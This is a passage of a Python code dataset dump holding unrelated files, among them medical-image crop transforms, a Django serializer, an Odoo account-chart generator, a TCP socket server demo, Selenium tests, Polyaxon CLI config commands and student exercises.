self._record['description'])\r\n","sub_path":"windows/dryfire/viewModel/bgfgsViewModel.py","file_name":"bgfgsViewModel.py","file_ext":"py","file_size_in_byte":7733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"359032912","text":"# Copyright 2017 Division of Medical Image Computing, German Cancer Research Center (DKFZ)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom batchgenerators.augmentations.crop_and_pad_augmentations import center_crop, pad_nd_image_and_seg, random_crop\nfrom batchgenerators.transforms.abstract_transforms import AbstractTransform\nimport numpy as np\n\n\nclass CenterCropTransform(AbstractTransform):\n \"\"\" Crops data and seg (if available) in the center\n\n Args:\n output_size (int or tuple of int): Output patch size\n\n \"\"\"\n\n def __init__(self, crop_size, data_key=\"data\", label_key=\"seg\"):\n self.data_key = data_key\n self.label_key = label_key\n self.crop_size = crop_size\n\n def __call__(self, **data_dict):\n data = data_dict.get(self.data_key)\n seg = data_dict.get(self.label_key)\n data, seg = center_crop(data, self.crop_size, seg)\n\n data_dict[self.data_key] = data\n if seg is not None:\n data_dict[self.label_key] = seg\n\n return data_dict\n\n\nclass CenterCropSegTransform(AbstractTransform):\n \"\"\" Crops seg in the center (required if you are using unpadded convolutions in a segmentation network).\n Leaves data as it is\n\n Args:\n output_size (int or tuple of int): Output patch size\n\n \"\"\"\n\n def __init__(self, output_size, data_key=\"data\", label_key=\"seg\"):\n self.data_key = data_key\n self.label_key = label_key\n self.output_size = output_size\n\n def __call__(self, **data_dict):\n seg = data_dict.get(self.label_key)\n\n if seg is not None:\n data_dict[self.label_key] = center_crop(seg, self.output_size, None)[0]\n else:\n from warnings import warn\n warn(\"You shall not pass data_dict without seg: Used CenterCropSegTransform, but there is no seg\", Warning)\n return data_dict\n\n\nclass RandomCropTransform(AbstractTransform):\n \"\"\" Randomly crops data and seg (if available)\n\n Args:\n crop_size (int or tuple of int): Output patch size\n\n margins (tuple of int): how much distance should the patch border have to the image broder (bilaterally)?\n\n \"\"\"\n\n def __init__(self, crop_size=128, margins=(0, 0, 0), data_key=\"data\", label_key=\"seg\"):\n self.data_key = data_key\n self.label_key = label_key\n self.margins = margins\n self.crop_size = crop_size\n\n def __call__(self, **data_dict):\n data = data_dict.get(self.data_key)\n seg = data_dict.get(self.label_key)\n\n data, seg = random_crop(data, seg, self.crop_size, self.margins)\n\n data_dict[self.data_key] = data\n if seg is not None:\n data_dict[self.label_key] = seg\n\n return data_dict\n\n\nclass PadTransform(AbstractTransform):\n def __init__(self, new_size, pad_mode_data='constant', pad_mode_seg='constant',\n np_pad_kwargs_data=None, np_pad_kwargs_seg=None,\n data_key=\"data\", label_key=\"seg\"):\n \"\"\"\n Pads data and seg to new_size. Only supports numpy arrays for data and seg.\n\n :param new_size: (x, y(, z))\n :param pad_value_data:\n :param pad_value_seg:\n :param data_key:\n :param label_key:\n \"\"\"\n self.data_key = data_key\n self.label_key = label_key\n self.new_size = new_size\n self.pad_mode_data = pad_mode_data\n self.pad_mode_seg = pad_mode_seg\n if np_pad_kwargs_data is None:\n np_pad_kwargs_data = {}\n if np_pad_kwargs_seg is None:\n np_pad_kwargs_seg = {}\n self.np_pad_kwargs_data = np_pad_kwargs_data\n self.np_pad_kwargs_seg = np_pad_kwargs_seg\n\n assert isinstance(self.new_size, (tuple, list, np.ndarray)), \"new_size must be tuple, list or np.ndarray\"\n\n def __call__(self, **data_dict):\n data = data_dict.get(self.data_key)\n seg = data_dict.get(self.label_key)\n\n assert len(self.new_size) + 2 == len(data.shape), \"new size must be a tuple/list/np.ndarray with shape \" \\\n \"(x, y(, z))\"\n data, seg = pad_nd_image_and_seg(data, seg, self.new_size, None,\n np_pad_kwargs_data=self.np_pad_kwargs_data,\n np_pad_kwargs_seg=self.np_pad_kwargs_seg,\n pad_mode_data=self.pad_mode_data,\n pad_mode_seg=self.pad_mode_seg)\n\n data_dict[self.data_key] = data\n if seg is not None:\n data_dict[self.label_key] = seg\n\n return data_dict\n\n","sub_path":"batchgenerators/transforms/crop_and_pad_transforms.py","file_name":"crop_and_pad_transforms.py","file_ext":"py","file_size_in_byte":5118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"313482566","text":"from rest_framework import serializers\n\nfrom pharmacy.models import Pharmacy, PharmacyAddress\n\n\nclass PharmacySerializer(serializers.ModelSerializer):\n address = serializers.SerializerMethodField(read_only=True)\n\n class Meta:\n model = Pharmacy\n fields = (\"id\", \"user\", \"drugs\", \"website\", \"name\", \"phone\", \"address\")\n\n def get_address(self, obj):\n obj_list = PharmacyAddress.objects.filter(pharmacy=obj)\n if obj_list.exists():\n return PharmacyAddressSerializer(obj_list, many=True).data\n else:\n return None\n\n\nclass PharmacyAddressSerializer(serializers.ModelSerializer):\n class Meta:\n model = PharmacyAddress\n fields = \"__all__\"\n","sub_path":"pharmacy/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"135198568","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution, third party addon\n# Copyright (C) 2004-2015 Vertel AB ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nimport base64\nimport sys\nsys.path.append('./')\nsys.path.append('../')\nimport traceback\nfrom lxml import etree\n\nimport click\nfrom xlrd import open_workbook\nfrom account_rules import account_rules as Rule\n\n\ndef record(parent, id, model):\n r = etree.SubElement(parent, 'record')\n r.set('id', id)\n r.set('model', model)\n return r\n\ndef field(parent, name, value='', attrs=None):\n f = etree.SubElement(parent, 'field')\n f.set('name', name)\n if value:\n f.text = value\n for attr in attrs or {}:\n f.set(attr, attrs[attr] or 'None')\n return f\n\ndef mk_chart(data,type,name,year,accounts,rule):\n #~ root_account = record(data, '%s_1955_%s' % (type,year), 'account.account.template')\n #~ field(root_account,'name','Bank transfer')\n #~ field(root_account,'code','1955')\n #~ field(root_account,'user_type_id','',{'ref': 'account.data_account_type_current_assets'})\n #~ field(root_account,'reconcile', '', {'eval': 'True'})\n\n exid = 'chart_template_%s_%s' % (type,year)\n ke = record(data, exid, 'account.chart.template')\n field(ke, 'name', name)\n field(ke, 'parent_id', '', {'ref': 'chart_template_general'})\n # ~ field(ke, 'transfer_account_id', '', {'ref': 'chart1955'}) Is gone in odoo12 \n #~ field(ke, 'transfer_account_id', '', {'ref': '%s_1955_%s' % (type,year)})\n field(ke, 'currency_id', '', {'ref': 'base.SEK'})\n field(ke, 'cash_account_code_prefix', '191')\n field(ke, 'bank_account_code_prefix', '193')\n field(ke, 'transfer_account_code_prefix', '195')\n #~ field(ke, 'property_account_receivable_id', '', {'ref': 'chart1510'})\n #~ field(ke, 'property_account_payable_id', '', {'ref': 'chart2440'})\n #~ field(ke, 'property_account_expense_categ_id', '', {'ref': 'chart4000'})\n #~ field(ke, 'property_account_income_categ_id', '', {'ref': 'chart3001'})\n #~ field(ke, 'property_account_expense_id', '', {'ref': 'chart4000'})\n #~ field(ke, 'property_account_income_id', '', {'ref': 'chart3001'})\n field(ke, 'code_digits', '4')\n #~ field(ke, 'tax_template_ids', '', {'eval': \"[(6,0,[ref('%s_mp1'),ref('%s_i')])]\" %(type, type)})\n #~ root_account2 = record(data, '%s_1955_%s' % (type,year), 'account.account.template')\n #~ field(root_account2, 'chart_template_id', '', {'ref': exid})\n\n for account in accounts:\n r = record(data, '%s_%s_%s' % (type,account['code'], year), 'account.account.template')\n field(r, 'name', account['name'])\n field(r, 'code', account['code'])\n field(r, 'user_type_id', '', {'ref': rule.code2user_type_id(account['code'])})\n field(r, 'chart_template_id', '', {'ref': exid})\n if rule.code2note(account['code']):\n field(r, 'note', rule.code2note(account['code']))\n if rule.code2tax_ids(account['code']):\n field(r, 'tax_ids', '', {'eval': rule.code2tax_ids(account['code'])})\n if rule.code2tag_ids(account['code']):\n field(r, 'tag_ids', '', {'eval': rule.code2tag_ids(account['code'])})\n if rule.code2reconcile(account['code']):\n field(r, 'reconcile', '', {'eval': 'True'})\n\n@click.command()\n@click.option('--year', default=2017, help='Year for the Chart of Account.')\n@click.argument('input', default='Kontoplan_Normal_2021.xls',type=click.File('rb'))\n@click.argument('output',default='../data/account_chart_template_k23.xml' ,type=click.File('wb'))\n\ndef import_excel(year, input, output):\n wb = open_workbook(file_contents=input.read(), formatting_info=True)\n ws = wb.sheet_by_index(0)\n\n not_k2 = u'[Ej K2]'\n\n k2 = []\n k3 = []\n rule = Rule()\n\n general_accounts = [1410,1510,1630,1650,1910,1920,1930,1955,2440,2610,2611,\n 2612,2613,2614,2615,2616,2618,2620,2621,2622,2623,2624,\n 2625,2626,2628,2630,2631,2632,2633,2634,2635,2636,2638,\n 2640,2641,2642,2643,2644,2645,2646,2647,2648,2649,2650,\n 2660,2710,2730,2760,2850,3000,3001,3002,3003,3004,3740,\n 4000,7000,7500,8990,8999]\n for row in ws.get_rows():\n if type(row[2].value) == float and 1000 <= row[2].value <= 9999 and not row[2].value in general_accounts:\n k3.append({\n 'code': str(int(row[2].value)),\n 'name': row[3].value,\n })\n if row[1].value != not_k2:\n k2.append({\n 'code': str(int(row[2].value)),\n 'name': row[3].value,\n })\n if type(row[5].value) == float and 1000 <= row[5].value <= 9999 and not row[5].value in general_accounts:\n k3.append({\n 'code': str(int(row[5].value)),\n 'name': row[6].value,\n })\n if row[4].value != not_k2:\n k2.append({\n 'code': str(int(row[5].value)),\n 'name': row[6].value,\n })\n\n root = etree.Element('odoo')\n data = etree.SubElement(root, 'data')\n\n mk_chart(data,'K1',u'K1 - Mindre verksamheter',year,k2,rule)\n mk_chart(data,'K2',u'K2 - Små till medelstora verksamheter',year,k2,rule)\n mk_chart(data,'K3',u'K3 - Medelstora till större verksamheter',year,k3,rule)\n mk_chart(data,'K4',u'K4 - större verksamheter / publika företag',year,k3,rule)\n\n # Write file.\n output.write(etree.tostring(root, xml_declaration=True, encoding=\"utf-8\", pretty_print=True))\n\nif __name__ == '__main__':\n import_excel()\n","sub_path":"l10n_se/notnamedbin/bas_account_plan.py","file_name":"bas_account_plan.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"378572600","text":"# -*- coding: utf-8 -*-\nn=int(input('digite um numero'))\n\ncont=0\ni=1\nfor i in range(2,n,1):\n if (i%n==0):\n cont=cont+1\nprint(i)\ni=i+1\n ","sub_path":"moodledata/vpl_data/128/usersdata/227/44257/submittedfiles/al6.py","file_name":"al6.py","file_ext":"py","file_size_in_byte":152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"259551220","text":"import socket\n\n\ndef main():\n\t#1.买一个手机(创建套接字)\n\ttcp_server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\n\t#2.插入手机卡(绑定本地信息 bind)\n\ttcp_server_socket.bind((\"\",7891))\n\n\n\t#3.将手机设置为正常的响铃模式(让默认的套接字由主动变为被动 listen)\n\ttcp_server_socket.listen(128)\n\n\twhile True:\n\t\t#4.等待别人的电话到来(等待客户端的连接(客户端调动connect) accept)\n\t\tnew_client_socket,client_addr = tcp_server_socket.accept()\n\t\tprint(client_addr)\n\t\twhile True:\n\t\t\t#5.收到客户端发过来的请求\n\t\t\trecv_data = new_client_socket.recv(1024)\n\n\t\t\t#如果recv 解堵塞,那么有两种情况\n\t\t\t#1.第一种是客服端发送过来数据\n\t\t\t#2.第二种是客服端断开连接\n\t\t\tif recv_data:\n\t\t\t\tprint(recv_data)\n\t\t\t\t#6.回复客户端\n\t\t\t\tnew_client_socket.send(\"dfsfsada\".encode(\"utf-8\"))\n\t\t\telse:\n\t\t\t\tbreak\n\t\t\t\n\t\t\n\t\t#7.关闭套接字\n\t\tnew_client_socket.close()\n\n\ttcp_server_socket.close()\n\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"系统学习Python/多任务/Test/04.socket_tcp服务器端.py","file_name":"04.socket_tcp服务器端.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"4927138","text":"import pytest\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException, ElementNotVisibleException\nfrom HW9_PO.page import LoginPage, DashboardPage, ProductPageButtons, ProductEditPage\nfrom HW9_PO.locators import ProductPageLocators\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef login(driver):\n \"\"\"Авторизация\"\"\"\n driver.get('http://localhost/admin')\n login_page = LoginPage(driver)\n login_page.login_on_page('admin', 'admin')\n WebDriverWait(driver=driver, timeout=10).until(ec.title_contains('Dashboard'))\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef select_product_page(driver):\n try:\n dashboard_page = DashboardPage(driver)\n dashboard_page.open_catalog()\n dashboard_page.open_products()\n except (NoSuchElementException, ElementNotVisibleException):\n return print(\"Элемент отсутствует или не найден\")\n\n\n@pytest.fixture\ndef product_edit_page(driver):\n return ProductEditPage(driver)\n\n\n@pytest.fixture\ndef product_page(driver):\n return ProductPageButtons(driver)\n\n\n@pytest.fixture\ndef add_product(product_edit_page):\n try:\n product_name = 'aaaTest_product'\n tag_title = 'test_tag_title'\n model_name = 'test_model_name'\n product_edit_page.add_product(product_name, tag_title, model_name)\n except (NoSuchElementException, ElementNotVisibleException):\n return print(\"Элемент отсутствует или не найден\")\n\n\n@pytest.fixture\ndef edit_product(product_edit_page):\n try:\n new_product_name = 'aaTest'\n product_edit_page.click_edit_product(new_product_name)\n except (NoSuchElementException, ElementNotVisibleException):\n return print(\"Элемент отсутствует или не найден\")\n\n\n@pytest.fixture\ndef delete_product(product_page):\n product_page.delete_product_by_name()\n\n\n@pytest.mark.usefixtures(\"add_product\")\ndef test_add_product():\n \"\"\"Создание продукта\"\"\"\n assert ProductPageLocators.SUCCESS_ALERT\n\n\n@pytest.mark.usefixtures(\"edit_product\")\ndef test_edit_product():\n \"\"\"Редактирование продукта\"\"\"\n assert ProductPageLocators.SUCCESS_ALERT\n\n\n@pytest.mark.usefixtures(\"delete_product\")\ndef test_delete_product():\n \"\"\"Удаление продукта\"\"\"\n assert ProductPageLocators.SUCCESS_ALERT\n","sub_path":"HW9_PO/test_product.py","file_name":"test_product.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"407406315","text":"# -*- coding: utf-8 -*-\n########################################### -> MÓDULOS\nfrom math import sqrt\n\n########################################### -> FUNÇÕES\ndef media(lista):\n MEDIA = sum(lista)/len(lista)\n \n return MEDIA\n \ndef dp(lista, MEDIA):\n somat = 0\n \n for xi in lista:\n somat += (xi-MEDIA)**2\n \n DP = sqrt(somat/(len(lista) - 1))\n \n return DP\n\n########################################### -> PROGRAMA PRINCIPAL\n\nm = int(input())\nn = int(input())\nlistas = []\nfor i in range(m):\n lista = []\n for j in range(n):\n lista.append(int(input()))\n \n listas.append(lista)\n \nfor i in listas:\n print(\"%.2f\"%media(i))\n print(\"%.2f\"%dp(i, media(i)))\n ","sub_path":"moodledata/vpl_data/468/usersdata/292/111630/submittedfiles/Av2_Parte3.py","file_name":"Av2_Parte3.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"81993746","text":"import os\nimport collections\nfrom PIL import Image\nimport math\n\ntarget_dir = r\"O:\\Well Files Operated\\Mathews 2-8H\\Core\\Pictures\"\n# target_dir = r\"C:\\Users\\wnixon\\Documents\\GitHub\\stitchLogImages\\testImages\"\nout_folder = r\"O:\\Well Files Operated\\Mathews 2-8H\\Core\\MergedLogPhotos\"\nchunk_size = 50\n##FIGURE OUT A WAY TO DO THIS IN 50 PICTURE CHUNKS\n\nfor root, dirs, files in os.walk(target_dir):\n\tprint('''Reading Files From:\n\t\t\t\tROOT = {0}\n\t\t\t\tDIRS = {1}\n\t\t\t\tFILES = {2}'''.format(root, dirs, files))\n\nimages = {}\nfor item in files:\n\tprint (\"Item = {0}\".format(item))\n\tfilename, ext = os.path.splitext(os.path.basename(item))\n\tprint(\"Filename = {0} Ext = {1}\".format(filename, ext))\n\tif ext.lower() == \".jpg\":\n\t\tfilekey = int(filename.split('_')[1])\n\t\timages.setdefault(filekey, os.path.join(root,item))\n\norderedImages = collections.OrderedDict(sorted(images.items()))\n\t\nnumber_of_chunks = int(math.ceil(len(files) / chunk_size))\nprint(\"Number of Chunks = {0}\".format(number_of_chunks))\n\nimageList = []\nfor v in orderedImages.values():\n\timageList.append(v)\n\ndef chunks(l,n):\n\tfor i in xrange(0, len(l), n):\n\t\treturn [l[i:i+n] for i in range(0, len(l), n)]\n\nchunked_list = chunks(imageList, chunk_size)\nprint(chunked_list)\n\ni=0\nfor chunk in chunked_list:\n\tfilename = \"Matthews1-8_MergedCoreImages_Part_{0}.png\".format(i)\n\tout_file = os.path.join(out_folder, filename)\n\ti += 1\n\n\tImgM = {\"height\": 0, \"width\": 0, \"mode\": \"\"}\n\n\tfor item in chunk:\n\t\tprint(\"ITEM = {0}\".format(item))\n\t\timg = Image.open(item)\n\t\tImgM['width'] += img.size[0]\n\t\tif img.size[1] > ImgM['height']:\n\t\t\tImgM['height'] = img.size[1]\n\t\tImgM['mode'] = img.mode\n\t\t# if ImgM['mode'] != img.mode:\n\t\t\t# print(\"ImgM['height'] = {0} != img.mode = {1}\".format(ImgM['mode'],img.mode))\n\t\tdel img\n\t\n\tbigIm = Image.new(ImgM['mode'], (ImgM['width'],ImgM['height']))\n\n\tupperLeftX = 0\n\tupperLeftY = 0\n\n\tfor item2 in chunk:\n\t\timg2 = Image.open(item2)\n\n\t\tbigIm.paste(img2,(upperLeftX,upperLeftY))\n\t\tupperLeftX += img2.size[0]\n\t\t \n\t\tdel img2\n\n\tbigIm.save(out_file)\n\tprint(\"{0} saved\".format(out_file))\n\tdel bigIm\n\n","sub_path":"logStitcher.py","file_name":"logStitcher.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"250744442","text":"#!/usr/bin/python\n#\n# Copyright 2018-2022 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\n\nimport click\n\nfrom polyaxon.cli.errors import handle_cli_error\nfrom polyaxon.cli.session import set_versions_config\nfrom polyaxon.logger import clean_outputs\nfrom polyaxon.managers.auth import AuthConfigManager\nfrom polyaxon.managers.cli import CliConfigManager\nfrom polyaxon.managers.client import ClientConfigManager\nfrom polyaxon.managers.project import ProjectConfigManager\nfrom polyaxon.managers.run import RunConfigManager\nfrom polyaxon.managers.user import UserConfigManager\nfrom polyaxon.utils.formatting import Printer, dict_tabulate, dict_to_tabulate\n\n\ndef validate_options(ctx, param, value):\n possible_values = [\"verbose\", \"host\"]\n if value and value not in possible_values:\n raise click.BadParameter(\n \"Value `{}` is not supported, must one of the value {}\".format(\n value, possible_values\n )\n )\n return value\n\n\n@click.group(invoke_without_command=True)\n@click.option(\n \"--list\",\n \"-l\",\n \"_list\",\n is_flag=True,\n help=\"Deprecated, please use `polyaxon config show`.\",\n)\n@clean_outputs\ndef config(_list): # pylint:disable=redefined-builtin\n \"\"\"Set and get the global configurations.\"\"\"\n if _list:\n Printer.print_warning(\n \"`polyaxon config -l` is deprecated, please use `polyaxon config show`!\"\n )\n\n\n@config.command()\n@clean_outputs\ndef show():\n \"\"\"Show the current cli, client, and user configs.\"\"\"\n _config = ClientConfigManager.get_config_or_default()\n Printer.print_heading(\"Client config:\")\n dict_tabulate(_config.to_dict())\n _config = CliConfigManager.get_config_or_default()\n if _config:\n Printer.print_heading(\"CLI config:\")\n if _config.current_version:\n Printer.print(\"Version {}\".format(_config.current_version))\n else:\n Printer.print_warning(\"This cli is not configured.\")\n if _config.installation:\n config_installation = dict_to_tabulate(\n _config.installation,\n humanize_values=True,\n exclude_attrs=[\"hmac\", \"auth\", \"host\"],\n )\n Printer.print_heading(\"Platform config:\")\n dict_tabulate(config_installation)\n else:\n Printer.print_warning(\"This cli is not connected to a Polyaxon Host.\")\n _config = UserConfigManager.get_config_or_default()\n if _config:\n Printer.print_heading(\"User config:\")\n config_user = dict_to_tabulate(\n _config.to_dict(),\n humanize_values=True,\n exclude_attrs=[\"theme\"],\n )\n dict_tabulate(config_user)\n\n\n@config.command()\n@click.argument(\"keys\", type=str, nargs=-1)\n@clean_outputs\ndef get(keys):\n \"\"\"Get the specific keys from the global configuration.\n\n Examples:\n\n \\b\n $ polyaxon config get host verify-ssl\n \"\"\"\n _config = ClientConfigManager.get_config_or_default()\n\n if not keys:\n return\n\n print_values = {}\n for key in keys:\n key = key.replace(\"-\", \"_\")\n if hasattr(_config, key):\n print_values[key] = getattr(_config, key)\n else:\n Printer.print(\"Key `{}` is not recognised.\".format(key))\n\n dict_tabulate(print_values)\n\n\n@config.command()\n@click.option(\"--debug\", type=bool, help=\"To set the verbosity of the client.\")\n@click.option(\"--host\", type=str, help=\"To set the server endpoint.\")\n@click.option(\n \"--no-api\",\n type=bool,\n help=\"To disable any API call.\",\n)\n@click.option(\n \"--verify-ssl\",\n type=bool,\n help=\"To set whether or not to verify the SSL certificate.\",\n)\n@click.option(\n \"--disable-errors-reporting\",\n type=bool,\n help=\"To set the disable errors reporting.\",\n)\n@click.option(\n \"--no-purge\",\n is_flag=True,\n default=False,\n help=\"To reconfigure the host without purging auth and other config options.\",\n)\n@clean_outputs\ndef set(**kwargs): # pylint:disable=redefined-builtin\n \"\"\"Set the global config values.\n\n Examples:\n\n \\b\n $ polyaxon config set --host=localhost\n \"\"\"\n try:\n _config = ClientConfigManager.get_config_or_default()\n except Exception as e:\n handle_cli_error(e, message=\"Polyaxon load configuration.\")\n Printer.print_heading(\n \"You can reset your config by running: `polyaxon config purge`\"\n )\n sys.exit(1)\n\n should_purge = False\n for key, value in kwargs.items():\n if key == \"host\" and value is not None:\n should_purge = True\n if value is not None:\n setattr(_config, key, value)\n\n ClientConfigManager.set_config(_config)\n Printer.print_success(\"Config was updated.\")\n # Reset cli config\n CliConfigManager.purge()\n if should_purge and not kwargs.get(\"no_purge\"):\n AuthConfigManager.purge()\n UserConfigManager.purge()\n set_versions_config()\n\n\n@config.command()\n@click.option(\n \"--cache-only\",\n is_flag=True,\n help=\"To purge the cache only.\",\n)\n@clean_outputs\ndef purge(cache_only):\n \"\"\"Purge the global config values.\"\"\"\n if not cache_only:\n ClientConfigManager.purge()\n CliConfigManager.purge()\n AuthConfigManager.purge()\n UserConfigManager.purge()\n ProjectConfigManager.purge()\n RunConfigManager.purge()\n Printer.print_success(\"Configs was removed.\")\n","sub_path":"core/polyaxon/cli/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"338979589","text":"from rest_framework import status, views, generics\nfrom rest_framework.response import Response\n\n\nfrom content import serializers as srlzr\nfrom content.permissions import ContentPermission, CategoryPermission\nfrom content.models import Content, Category\n\n\nclass ContentListCreateView(generics.ListCreateAPIView):\n\n serializer_class = srlzr.ContentSerializer\n permission_classes = (ContentPermission,)\n queryset = Content.objects.all()\n\n def post(self, request):\n serializer = srlzr.CreateContentSerializer(data=request.DATA)\n if serializer.is_valid():\n content = Content.objects.create(\n author_id=self.request.user.pk,\n title=serializer.data.get('title'),\n message=serializer.data.get('message'),\n category_id=serializer.data.get('category'))\n result = srlzr.CreateContentResponseSerializer()\n result.data['url'] = content.get_absolute_url()\n\n return Response(result.data, status=status.HTTP_201_CREATED)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ContentDetailView(generics.RetrieveUpdateDestroyAPIView):\n\n serializer_class = srlzr.ContentSerializer\n permission_classes = (ContentPermission,)\n queryset = Content.objects.all()\n\n\nclass CategoryListCreateView(generics.ListCreateAPIView):\n\n permission_classes = (CategoryPermission,)\n serializer_class = srlzr.CategorySerializer\n queryset = Category.objects.all()\n\n\nclass CategoryDetailView(generics.RetrieveUpdateDestroyAPIView):\n \n permission_classes = (CategoryPermission,)\n serializer_class = srlzr.CategorySerializer\n queryset = Category.objects.all()\n","sub_path":"knowdaledge/api/content_api.py","file_name":"content_api.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"615738111","text":"# -*- coding: utf-8 -*-\n\n\ndef isprime(n):\n if n == 1 or n == 0:\n return False\n # rango empieza en 2, y solo tenemos que llegar hasta el cuadrado de n\n for x in range(2, int(n**0.5)+1):\n if n % x == 0:\n return False\n return True\n\n\ndef nextprime(n):\n while not isprime(n+1):\n n = n + 1\n return n + 1\n\n\ndef lprimepower(limit):\n\n p = 2\n lprimes2 = []\n lprimes3 = []\n lprimes4 = []\n exxit = False\n\n while not exxit:\n if p**2 < limit:\n lprimes2.append(p**2)\n else:\n exxit = True\n\n if p**3 < limit:\n lprimes3.append(p**3)\n\n if p**4 < limit:\n lprimes4.append(p**4)\n\n p = nextprime(p)\n\n return lprimes2, lprimes3, lprimes4\n\n\ndef result():\n limit = 50000000\n l2, l3, l4 = lprimepower(limit)\n\n # print(len(l2))\n # print(len(l3))\n # print(len(l4))\n\n ltotal = []\n count = 0\n for i2 in l2:\n count += 1\n # if count % 10 == 0:\n # print(count)\n for i3 in l3:\n if i2+i3 > limit:\n break\n for i4 in l4:\n zum = i2+i3+i4\n if zum < limit:\n if zum not in ltotal:\n ltotal.append(zum)\n else:\n break\n\n # print('Resultado 0087:', len(ltotal))\n return len(ltotal)\n","sub_path":"projecteuler/problems/d0075/p0087/r0087.py","file_name":"r0087.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"522156434","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/PYB11Generator/PYB11STLmethods.py\n# Compiled at: 2019-03-04 00:14:46\nimport inspect\nfrom PYB11utils import *\n\nclass PYB11_bind_vector:\n\n def __init__(self, element, opaque=False, local=None):\n self.element = element\n self.opaque = opaque\n self.local = local\n\n def preamble(self, modobj, ss, name):\n if self.opaque:\n ss('PYBIND11_MAKE_OPAQUE(std::vector<' + PYB11CPPsafe(self.element) + '>)\\n')\n\n def __call__(self, modobj, ss, name):\n ss('py::bind_vector>(m, \"' + name + '\"')\n if self.local is not None:\n ss(', py::module_local(')\n if self.local:\n ss('true)')\n else:\n ss('false)')\n ss(');\\n')\n return\n\n\nclass PYB11_bind_map:\n\n def __init__(self, key, value, opaque=False, local=None):\n self.key = key\n self.value = value\n self.opaque = opaque\n self.local = local\n\n def preamble(self, modobj, ss, name):\n if self.opaque:\n cppname = 'std::map<' + self.key + ',' + self.value + '>'\n ss('PYBIND11_MAKE_OPAQUE(' + PYB11CPPsafe(cppname) + ');\\n')\n\n def __call__(self, modobj, ss, name):\n ss('py::bind_map>(m, \"' + name + '\"')\n if self.local is not None:\n ss(', py::module_local(')\n if self.local:\n ss('true)')\n else:\n ss('false)')\n ss(');\\n')\n return\n\n\ndef PYB11STLobjs(modobj):\n return [ (name, obj) for name, obj in inspect.getmembers(modobj) if name[:5] != 'PYB11' and (isinstance(obj, PYB11_bind_vector) or isinstance(obj, PYB11_bind_map))\n ]\n\n\ndef PYB11generateModuleSTL(modobj, ss):\n stuff = PYB11STLobjs(modobj)\n for name, obj in stuff:\n ss(' ')\n obj(modobj, ss, name)\n\n ss('\\n')","sub_path":"pycfiles/PYB11Generator-1.0.11.tar/PYB11STLmethods.py","file_name":"PYB11STLmethods.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"500132138","text":"people = [{'first_name': 'Edward',\n 'last_name': 'Snowden',\n 'age': 27,\n 'city': 'Tokyo'},\n\n {'first_name': 'Kevin',\n 'last_name': 'Mitnick',\n 'age': 32,\n 'city': 'Raleigh'},\n\n {'first_name': 'Brian',\n 'last_name': 'Krebs',\n 'age': 48,\n 'city': 